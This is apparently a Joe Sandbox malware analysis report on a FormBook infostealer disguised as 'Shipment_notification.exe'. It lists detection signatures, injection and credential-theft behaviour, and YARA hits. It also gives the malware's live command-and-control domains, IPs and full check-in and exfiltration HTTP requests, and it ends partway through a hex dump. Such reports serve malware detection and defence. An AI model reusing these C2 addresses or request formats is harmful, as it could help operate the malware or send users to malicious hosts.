Windows Analysis Report
Shipment_notification.exe

Overview

General Information

Sample Name: Shipment_notification.exe
Analysis ID: 830738
MD5: c310a64af890ac32abff89e86cb53a33
SHA1: 509cdec4d058011fb55535a936e56d3158f3f05a
SHA256: 90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Shipment_notification.exe ReversingLabs: Detection: 39%
Source: Shipment_notification.exe Virustotal: Detection: 43% Perma Link
Yara detected FormBook
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.searchvity.com/?dn= URL Reputation: Label: malware
Source: http://www.ywtxsm.com/rs5b/Pr Avira URL Cloud: Label: malware
Source: http://www.searchvity.com/ URL Reputation: Label: malware
Source: http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU Avira URL Cloud: Label: phishing
Source: http://www.drkathleensanders.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.peramid.xyz/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.piergitarshoes.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.ywtxsm.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: phishing
Source: http://www.isabellagambitta.com/rs5b/ Avira URL Cloud: Label: phishing
Source: http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.peramid.xyz Avira URL Cloud: Label: malware
Source: http://www.53876.world Avira URL Cloud: Label: malware
Source: http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.53876.world/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.locationsbormes.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.carcosainvest.com/rs5b/ Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: Shipment_notification.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.Shipment_notification.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: Shipment_notification.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Shipment_notification.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: CYYO.pdb source: Shipment_notification.exe
Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 206.54.190.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.218.155.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tcatelier.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.223 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.114.105.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.carcosainvest.com
Source: C:\Windows\explorer.exe Domain query: www.locationsbormes.com
Source: C:\Windows\explorer.exe Domain query: www.peramid.xyz
Source: C:\Windows\explorer.exe Network Connect: 198.177.124.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.piergitarshoes.com
Source: C:\Windows\explorer.exe Domain query: www.emagrecarapido.store
Source: C:\Windows\explorer.exe Domain query: www.isabellagambitta.com
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.96.161.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ywtxsm.com
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.drkathleensanders.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.peramid.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FINALFRONTIERVG FINALFRONTIERVG
Source: Joe Sandbox View ASN Name: WZCOM-US WZCOM-US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
Source: global traffic HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.carcosainvest.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.carcosainvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.carcosainvest.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 71 4d 38 79 7a 57 54 77 55 4a 41 42 4c 39 4a 59 6b 2d 38 44 5a 34 4d 5f 54 66 79 45 38 38 7e 44 37 73 37 4e 7e 45 63 5a 58 6b 58 6b 70 33 31 6c 7e 4c 35 76 55 39 64 7a 4b 4b 41 51 70 70 42 45 49 54 72 35 65 54 41 50 54 72 30 35 67 44 32 4d 76 62 49 37 72 41 57 43 6f 4a 6a 69 55 2d 38 52 54 4f 4d 4c 7e 34 57 53 4e 4a 73 7a 71 75 6c 30 48 4c 65 6f 33 5f 43 51 66 69 28 51 63 73 35 7a 70 58 59 49 37 77 79 46 77 4a 72 64 65 71 28 53 32 61 57 5f 77 56 63 71 36 38 46 77 45 46 57 4e 67 67 52 5f 65 54 6a 64 6c 56 39 4d 79 6e 47 50 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
Source: global traffic HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.piergitarshoes.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.piergitarshoes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.piergitarshoes.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 7e 6a 7a 4d 68 55 53 42 31 53 6c 4b 58 34 70 66 36 72 63 33 71 6e 54 4d 49 49 61 59 7e 6f 7e 41 69 46 47 35 65 45 4a 54 44 62 46 74 39 45 4b 6c 33 33 76 75 4d 73 66 55 76 37 62 61 44 61 70 32 4d 4c 59 50 43 51 51 5f 4c 69 67 31 73 43 31 77 30 44 74 75 6e 7a 4f 72 70 32 68 4a 46 69 6f 4d 4c 4b 34 46 4b 78 48 4f 51 71 6d 4a 6c 34 44 4f 51 79 46 62 6d 4e 67 5f 34 51 50 33 47 79 71 59 37 4f 68 6a 49 59 39 34 42 7a 5a 4c 71 6a 31 64 51 33 34 48 4f 69 39 44 46 6f 59 72 38 77 57 54 28 34 6d 51 51 77 7a 62 71 73 6e 37 6a 7a 4a 59 35 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
Source: global traffic HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.ywtxsm.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.ywtxsm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ywtxsm.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 50 47 36 75 30 55 43 37 51 4e 52 56 53 32 47 4a 65 45 36 54 64 48 56 4b 51 63 4c 6d 38 69 46 35 4b 68 72 68 34 70 35 58 31 68 37 7a 79 51 30 4c 28 35 6a 4d 56 66 28 6a 74 5a 55 55 32 59 35 39 39 42 6c 77 76 68 35 53 61 59 32 7a 5a 73 44 4b 57 39 5a 49 5a 4c 58 54 4d 70 6e 76 65 75 49 48 54 49 66 50 56 33 59 4e 38 66 62 61 42 6d 4c 32 4f 45 4e 77 69 69 69 58 4d 4e 34 4d 78 5a 6e 68 30 6c 62 35 72 6d 39 79 31 6b 56 6c 73 30 79 69 77 63 61 41 4b 54 36 79 59 78 6a 42 42 52 6d 51 77 49 48 64 72 77 37 43 42 73 58 41 34 30 72 58 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
Source: global traffic HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.peramid.xyzConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.peramid.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.peramid.xyz/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 6b 4e 49 33 52 4d 52 50 72 2d 32 47 68 42 4a 56 37 6b 51 76 38 65 6c 30 46 72 73 77 79 61 70 38 57 56 55 6f 38 77 6d 63 70 74 71 6e 6a 45 35 41 52 4f 45 5a 74 71 37 46 74 54 4e 49 28 78 44 55 61 6c 73 70 6e 33 28 37 56 70 61 79 7a 6c 6a 58 59 72 4c 30 51 35 46 7a 53 6d 49 73 4e 78 55 5f 37 2d 56 34 4c 36 71 36 73 61 70 79 32 4f 65 57 32 74 46 57 66 7a 5a 6e 56 50 4d 55 52 75 44 41 7e 50 65 4c 34 61 74 77 6e 52 31 4b 79 41 63 71 6a 32 77 67 57 44 38 75 43 6f 58 6f 33 4d 7e 44 41 45 62 73 37 46 69 45 68 65 54 75 66 66 54 4c 4f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
Source: global traffic HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.locationsbormes.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.locationsbormes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.locationsbormes.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 30 6c 4f 50 53 70 4b 5f 76 35 50 62 6b 37 28 30 67 52 4f 57 79 65 79 61 37 4f 67 44 79 65 59 63 57 6e 58 6f 56 43 35 53 76 72 76 68 4e 42 61 37 30 4c 4b 57 61 58 37 7a 32 63 78 32 31 69 42 77 59 52 35 53 4f 5f 72 70 36 58 71 50 68 4e 43 7a 69 6e 50 41 6f 56 45 61 52 41 49 77 59 2d 42 54 34 41 79 42 64 72 39 66 6a 6a 54 52 50 65 6d 78 55 48 7e 6f 4e 47 4b 37 5a 49 77 62 52 68 51 30 7e 79 61 61 42 5f 77 76 41 32 67 71 42 65 34 77 66 6a 70 74 7e 45 63 31 6d 34 59 58 4b 4c 74 50 39 38 79 55 50 75 57 4e 72 55 7a 52 45 53 56 33 74 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=0lOPSpK_v5Pbk7(0gROWyeya7OgDyeYcWnXoVC5SvrvhNBa70LKWaX7z2cx21iBwYR5SO_rp6XqPhNCzinPAoVEaRAIwY-BT4AyBdr9fjjTRPemxUH~oNGK7ZIwbRhQ0~yaaB_wvA2gqBe4wfjpt~Ec1m4YXKLtP98yUPuWNrUzRESV3tA).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:47 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:50 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 